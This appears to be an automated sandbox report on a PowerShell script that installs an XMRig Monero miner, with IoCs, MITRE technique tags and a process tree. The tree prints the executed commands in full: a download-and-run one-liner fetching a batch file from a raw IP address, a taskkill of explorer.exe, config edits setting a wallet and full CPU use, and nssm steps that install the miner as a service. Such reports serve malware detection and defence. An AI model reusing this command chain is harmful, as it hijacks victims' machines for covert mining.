xmrig | e68ae28adfa6a3fb898e890520e0c3eda33dbbe071d5503b4eeb440c93cd538a

Analysis

max time kernel
1139s
max time network
1137s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
04/07/2024, 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trigger.ps1
Size

148B
MD5

f894b24ca3109bdc8167d849a1e19660
SHA1

5d295d603c423498aa3c80fcd35e328df13fd7fc
SHA256

e68ae28adfa6a3fb898e890520e0c3eda33dbbe071d5503b4eeb440c93cd538a
SHA512

0b8ee8cc214b559e79a6c0029ac2cd4df6a8c5a8dc22f756632bbdacee996cca023a20944e8a0117ba285ddd201c128a9184ab57210f0dd6e4c2a7eddb108ee9

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023473-77.dat	family_xmrig
behavioral2/files/0x0007000000023473-77.dat	xmrig
behavioral2/memory/1800-80-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-251-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-252-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-253-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-254-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-255-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-256-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-257-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-258-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-259-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-260-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-261-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-262-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-263-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-264-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-265-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-266-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-267-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-268-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-269-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-270-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-271-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-272-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-273-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-274-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3572-275-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	4668	powershell.exe
9	1072	powershell.exe
15	4404	powershell.exe
17	3012	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1800	xmrig.exe
4968	nssm.exe
3044	nssm.exe
3916	nssm.exe
2904	nssm.exe
3528	nssm.exe
3652	nssm.exe
3828	nssm.exe
3572	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
17	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1912	sc.exe
1964	sc.exe
4512	sc.exe
2676	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4668	powershell.exe
1808	powershell.exe
4452	powershell.exe
3716	powershell.exe
2924	powershell.exe
2592	powershell.exe
3012	powershell.exe
2624	powershell.exe
3288	powershell.exe
3436	powershell.exe
4180	powershell.exe
1072	powershell.exe
4404	powershell.exe
4916	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4744	timeout.exe
1744	timeout.exe
5112	timeout.exe
312	Process not Found
980	Process not Found
1272	timeout.exe
1472	timeout.exe
452	timeout.exe
2936	timeout.exe
3240	Process not Found
4576	Process not Found
4744	timeout.exe
2572	Process not Found
4020	Process not Found
432	Process not Found
2376	timeout.exe
4768	Process not Found
844	Process not Found
2596	Process not Found
4836	Process not Found
3024	timeout.exe
1040	Process not Found
1656	timeout.exe
3916	timeout.exe
2264	timeout.exe
3968	timeout.exe
512	Process not Found
2544	Process not Found
4408	Process not Found
1040	timeout.exe
3976	timeout.exe
3032	timeout.exe
636	timeout.exe
856	timeout.exe
3052	Process not Found
912	Process not Found
4756	timeout.exe
1020	timeout.exe
2040	Process not Found
4648	Process not Found
1920	timeout.exe
740	Process not Found
3852	Process not Found
4328	Process not Found
4640	timeout.exe
1508	timeout.exe
4540	timeout.exe
1444	timeout.exe
3952	timeout.exe
3512	timeout.exe
2932	Process not Found
3768	timeout.exe
4092	timeout.exe
1304	timeout.exe
2652	timeout.exe
4600	timeout.exe
4348	Process not Found
2512	Process not Found
4288	timeout.exe
996	timeout.exe
2532	timeout.exe
4684	timeout.exe
4580	Process not Found
3032	Process not Found

Kills process with taskkill 2 IoCs

evasion

pid	Process
3820	taskkill.exe
2448	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4668	powershell.exe
4668	powershell.exe
1072	powershell.exe
1072	powershell.exe
4404	powershell.exe
4404	powershell.exe
1808	powershell.exe
1808	powershell.exe
2624	powershell.exe
2624	powershell.exe
2924	powershell.exe
2924	powershell.exe
2592	powershell.exe
2592	powershell.exe
4916	powershell.exe
4916	powershell.exe
3288	powershell.exe
3288	powershell.exe
3436	powershell.exe
3436	powershell.exe
4180	powershell.exe
4180	powershell.exe
4452	powershell.exe
4452	powershell.exe
3012	powershell.exe
3012	powershell.exe
3716	powershell.exe
3716	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	2448	taskkill.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeLockMemoryPrivilege	3572	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4484	WMIC.exe
Token: SeSecurityPrivilege	4484	WMIC.exe
Token: SeTakeOwnershipPrivilege	4484	WMIC.exe
Token: SeLoadDriverPrivilege	4484	WMIC.exe
Token: SeSystemProfilePrivilege	4484	WMIC.exe
Token: SeSystemtimePrivilege	4484	WMIC.exe
Token: SeProfSingleProcessPrivilege	4484	WMIC.exe
Token: SeIncBasePriorityPrivilege	4484	WMIC.exe
Token: SeCreatePagefilePrivilege	4484	WMIC.exe
Token: SeBackupPrivilege	4484	WMIC.exe
Token: SeRestorePrivilege	4484	WMIC.exe
Token: SeShutdownPrivilege	4484	WMIC.exe
Token: SeDebugPrivilege	4484	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4484	WMIC.exe
Token: SeRemoteShutdownPrivilege	4484	WMIC.exe
Token: SeUndockPrivilege	4484	WMIC.exe
Token: SeManageVolumePrivilege	4484	WMIC.exe
Token: 33	4484	WMIC.exe
Token: 34	4484	WMIC.exe
Token: 35	4484	WMIC.exe
Token: 36	4484	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4484	WMIC.exe
Token: SeSecurityPrivilege	4484	WMIC.exe
Token: SeTakeOwnershipPrivilege	4484	WMIC.exe
Token: SeLoadDriverPrivilege	4484	WMIC.exe
Token: SeSystemProfilePrivilege	4484	WMIC.exe
Token: SeSystemtimePrivilege	4484	WMIC.exe
Token: SeProfSingleProcessPrivilege	4484	WMIC.exe
Token: SeIncBasePriorityPrivilege	4484	WMIC.exe
Token: SeCreatePagefilePrivilege	4484	WMIC.exe
Token: SeBackupPrivilege	4484	WMIC.exe
Token: SeRestorePrivilege	4484	WMIC.exe
Token: SeShutdownPrivilege	4484	WMIC.exe
Token: SeDebugPrivilege	4484	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4484	WMIC.exe
Token: SeRemoteShutdownPrivilege	4484	WMIC.exe
Token: SeUndockPrivilege	4484	WMIC.exe
Token: SeManageVolumePrivilege	4484	WMIC.exe
Token: 33	4484	WMIC.exe
Token: 34	4484	WMIC.exe
Token: 35	4484	WMIC.exe
Token: 36	4484	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5004	WMIC.exe
Token: SeSecurityPrivilege	5004	WMIC.exe
Token: SeTakeOwnershipPrivilege	5004	WMIC.exe
Token: SeLoadDriverPrivilege	5004	WMIC.exe
Token: SeSystemProfilePrivilege	5004	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3572	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4668 wrote to memory of 372	4668	powershell.exe	84
PID 4668 wrote to memory of 372	4668	powershell.exe	84
PID 372 wrote to memory of 3820	372	cmd.exe	86
PID 372 wrote to memory of 3820	372	cmd.exe	86
PID 372 wrote to memory of 1072	372	cmd.exe	88
PID 372 wrote to memory of 1072	372	cmd.exe	88
PID 1072 wrote to memory of 4536	1072	powershell.exe	89
PID 1072 wrote to memory of 4536	1072	powershell.exe	89
PID 4536 wrote to memory of 2784	4536	cmd.exe	90
PID 4536 wrote to memory of 2784	4536	cmd.exe	90
PID 2784 wrote to memory of 3436	2784	net.exe	91
PID 2784 wrote to memory of 3436	2784	net.exe	91
PID 4536 wrote to memory of 4688	4536	cmd.exe	92
PID 4536 wrote to memory of 4688	4536	cmd.exe	92
PID 4536 wrote to memory of 996	4536	cmd.exe	93
PID 4536 wrote to memory of 996	4536	cmd.exe	93
PID 4536 wrote to memory of 4696	4536	cmd.exe	94
PID 4536 wrote to memory of 4696	4536	cmd.exe	94
PID 4536 wrote to memory of 1932	4536	cmd.exe	95
PID 4536 wrote to memory of 1932	4536	cmd.exe	95
PID 4536 wrote to memory of 2404	4536	cmd.exe	96
PID 4536 wrote to memory of 2404	4536	cmd.exe	96
PID 4536 wrote to memory of 1912	4536	cmd.exe	97
PID 4536 wrote to memory of 1912	4536	cmd.exe	97
PID 4536 wrote to memory of 1964	4536	cmd.exe	98
PID 4536 wrote to memory of 1964	4536	cmd.exe	98
PID 4536 wrote to memory of 2448	4536	cmd.exe	99
PID 4536 wrote to memory of 2448	4536	cmd.exe	99
PID 4536 wrote to memory of 4404	4536	cmd.exe	100
PID 4536 wrote to memory of 4404	4536	cmd.exe	100
PID 4536 wrote to memory of 1808	4536	cmd.exe	101
PID 4536 wrote to memory of 1808	4536	cmd.exe	101
PID 4536 wrote to memory of 2624	4536	cmd.exe	102
PID 4536 wrote to memory of 2624	4536	cmd.exe	102
PID 4536 wrote to memory of 1800	4536	cmd.exe	103
PID 4536 wrote to memory of 1800	4536	cmd.exe	103
PID 4536 wrote to memory of 3956	4536	cmd.exe	104
PID 4536 wrote to memory of 3956	4536	cmd.exe	104
PID 3956 wrote to memory of 2924	3956	cmd.exe	105
PID 3956 wrote to memory of 2924	3956	cmd.exe	105
PID 2924 wrote to memory of 4208	2924	powershell.exe	106
PID 2924 wrote to memory of 4208	2924	powershell.exe	106
PID 4536 wrote to memory of 2592	4536	cmd.exe	107
PID 4536 wrote to memory of 2592	4536	cmd.exe	107
PID 4536 wrote to memory of 4916	4536	cmd.exe	108
PID 4536 wrote to memory of 4916	4536	cmd.exe	108
PID 4536 wrote to memory of 3288	4536	cmd.exe	109
PID 4536 wrote to memory of 3288	4536	cmd.exe	109
PID 4536 wrote to memory of 3436	4536	cmd.exe	110
PID 4536 wrote to memory of 3436	4536	cmd.exe	110
PID 4536 wrote to memory of 4180	4536	cmd.exe	111
PID 4536 wrote to memory of 4180	4536	cmd.exe	111
PID 4536 wrote to memory of 4452	4536	cmd.exe	112
PID 4536 wrote to memory of 4452	4536	cmd.exe	112
PID 4536 wrote to memory of 3012	4536	cmd.exe	113
PID 4536 wrote to memory of 3012	4536	cmd.exe	113
PID 4536 wrote to memory of 3716	4536	cmd.exe	114
PID 4536 wrote to memory of 3716	4536	cmd.exe	114
PID 4536 wrote to memory of 4512	4536	cmd.exe	115
PID 4536 wrote to memory of 4512	4536	cmd.exe	115
PID 4536 wrote to memory of 2676	4536	cmd.exe	116
PID 4536 wrote to memory of 2676	4536	cmd.exe	116
PID 4536 wrote to memory of 4968	4536	cmd.exe	117
PID 4536 wrote to memory of 4968	4536	cmd.exe	117

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_5472b326.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp831A.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4536
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2784
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:3436
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:4688
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:996
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:4696
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:1932
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:2404
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1912
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:1800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2924
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:4208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Mppnghqz\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3436
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3716
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:4512
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:2676
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4968
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:3044
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:3916
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:2904
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:3528
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
